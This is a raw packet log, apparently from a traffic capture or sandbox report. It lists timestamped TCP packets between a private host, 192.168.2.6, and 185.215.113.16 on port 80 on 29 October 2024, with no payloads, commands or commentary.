Oct 29, 2024 06:59:25.758744001 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.758749962 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.758770943 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.758783102 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.758793116 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.758806944 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.758810043 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.758830070 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.758837938 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.758841991 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.758856058 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.758879900 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.758894920 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.758903027 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.758913994 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.758925915 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.758934021 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.758936882 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.758965015 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.758980036 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.758980036 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.758991957 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.759058952 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.759068966 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.759078979 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.759097099 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.759099007 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.759116888 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.759124041 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.759130955 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.759143114 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.759143114 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.759154081 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.759171009 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.759205103 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.759211063 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.759222031 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.759236097 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.759248018 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.759272099 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.759294033 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.759346962 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.759357929 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.759367943 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.759392977 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.759399891 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.759412050 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.759428978 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.759439945 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.759471893 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.759474039 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.759483099 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.759507895 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.759532928 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.759545088 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.759577036 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.759583950 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.759596109 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.759607077 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.759618998 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.759644032 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.759686947 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.759701014 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.759718895 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.759732008 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.759743929 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.759744883 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.759772062 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.759793997 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.759834051 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.759844065 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.759849072 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.759871960 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.759876013 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.759884119 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.759910107 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.759987116 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.760004044 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.760018110 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.760029078 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.760045052 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.760056973 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.760061979 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.760091066 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.760091066 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.760106087 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.760139942 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.760140896 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.760154009 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.760165930 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.760190010 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.760334969 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.760353088 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.760373116 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.760385990 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.760396957 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.760409117 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.760418892 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.760428905 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.760430098 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.760451078 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.760467052 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.760474920 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.760519028 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.760529041 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.760539055 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.760561943 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.760586977 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.760639906 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.760651112 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.760662079 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.760674953 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.760684967 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.760685921 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.760708094 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.760720968 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.760746002 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.760756016 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.760759115 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.760793924 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.760816097 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.760827065 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.760838032 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.760862112 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.760931969 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.760941982 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.760952950 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.760963917 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.760976076 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.760977983 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.761004925 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.761018038 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.761044979 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.761054039 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.761085987 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.842964888 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.843049049 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.843069077 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.843081951 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.843094110 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.843105078 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.843107939 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.843118906 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.843141079 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.843157053 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.843168020 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.843178034 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.843189001 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.843198061 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.843199968 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.843223095 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.843225956 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.843238115 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.843239069 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.843250990 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.843265057 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.843286037 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.843317032 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.843379021 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.843389988 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.843404055 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.843420982 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.843425035 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.843434095 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.843446016 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.843456984 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.843477964 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.843544006 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.843560934 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.843571901 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.843583107 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.843594074 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.843596935 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.843605995 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.843621016 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.843621969 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.843633890 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.843647957 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.843663931 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.843687057 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.843698978 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.843729019 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.878349066 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.878403902 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.878514051 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.911308050 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.916762114 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.916811943 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.916946888 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.916975021 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.916987896 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.917026043 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.917026997 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.917038918 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.917051077 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.917063951 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.917078018 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.917161942 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.917232037 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.917244911 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.917256117 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.917268038 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.917280912 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.917282104 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.917289972 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.917294979 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.917308092 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.917318106 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.917320967 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.917330980 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.917356014 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.917368889 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.917380095 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.917391062 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.917396069 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.917402029 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.917427063 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.917427063 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.917439938 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.917450905 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.917458057 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.917464018 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.917470932 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.917476892 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.917490005 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.917515039 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.917690992 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.917695045 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.917723894 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.917735100 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.917746067 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.917757988 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.917761087 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.917769909 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.917782068 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.917793036 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.917793989 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.917804956 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.917814970 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.917819023 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.917824984 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.917833090 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.917844057 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.917855978 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.917866945 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.917908907 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.917967081 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.917979956 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.917989969 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.918003082 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.918014050 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.918052912 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.918097973 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.918111086 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.918121099 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.918133974 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.918144941 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.918144941 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.918165922 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.918170929 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.918179035 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.918190002 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.918191910 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.918216944 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.918239117 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.918251991 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.918262959 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.918275118 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.918287992 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.918313980 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.918313980 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.918329000 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.918340921 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.918351889 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.918354034 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.918366909 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.918378115 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.918380022 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.918421984 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.918447018 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.918554068 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.918586016 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.918605089 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.918617010 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.918628931 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.918639898 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.918651104 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.918653011 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.918664932 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.918677092 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.918689013 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.918689966 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.918700933 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.918701887 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.918734074 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.918762922 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.918807030 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.918818951 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.918831110 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.918845892 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.918857098 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.918859959 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.918873072 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.918885946 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.918910980 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.923651934 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.923662901 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.923717022 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.962551117 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.962616920 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.962627888 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.962640047 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.962656021 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.962685108 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.962697983 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.962708950 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.962719917 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.962732077 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.962774038 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.962789059 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.962789059 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.962800026 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.962816954 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.962826014 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.962829113 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.962855101 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.962982893 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.962994099 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.963002920 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.963042021 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.963046074 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.963068008 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.963107109 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.963118076 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.963218927 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.963224888 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.963229895 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.963242054 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.963253975 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.963265896 CET	49769	80	192.168.2.6	185.215.113.16
